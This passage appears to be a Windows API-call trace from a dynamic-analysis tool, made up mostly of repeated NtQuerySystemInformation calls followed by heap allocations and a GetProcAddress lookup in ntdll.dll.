(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.304] GetProcessHeap () returned 0x269489b0000 [0299.304] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcbdd0 [0299.304] GetProcessHeap () returned 0x269489b0000 [0299.304] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d19b0 [0299.305] GetProcessHeap () returned 0x269489b0000 [0299.305] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x11c) returned 0x269489c0d90 [0299.308] GetProcessHeap () returned 0x269489b0000 [0299.308] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x128) returned 0x269489c0540 [0299.308] GetProcessHeap () returned 0x269489b0000 [0299.308] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c5a060 [0299.308] GetProcessHeap () returned 0x269489b0000 [0299.308] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x130) returned 0x26949ae18b0 [0299.308] GetProcessHeap () returned 0x269489b0000 [0299.308] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bce870 [0299.308] GetProcessHeap () returned 0x269489b0000 [0299.309] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1ac0 [0299.309] GetProcessHeap () returned 0x269489b0000 [0299.309] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949b34030 | out: hHeap=0x269489b0000) returned 1 [0299.309] GetProcessHeap () returned 0x269489b0000 [0299.309] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1e4) returned 0x26949c7edd0 [0299.310] GetProcessHeap () returned 0x269489b0000 [0299.310] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x104) returned 0x26948a0eea0 [0299.311] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa78217f0e8 | out: phModule=0xa78217f0e8*=0x7ffcea380000) returned 1 [0299.311] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0299.311] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xa78217f210, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xa78217f210, ResultLength=0x0) returned 0x0 [0299.312] GetProcessHeap () returned 0x269489b0000 [0299.312] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c59fe0 [0299.312] GetProcessHeap () returned 0x269489b0000 [0299.312] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x50) returned 0x26949c92600 [0299.312] GetProcessHeap () returned 0x269489b0000 [0299.312] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcdd70 [0299.312] GetProcessHeap () returned 0x269489b0000 [0299.312] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1920 [0299.314] GetProcessHeap () returned 0x269489b0000 [0299.314] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x40) returned 0x26949c245c0 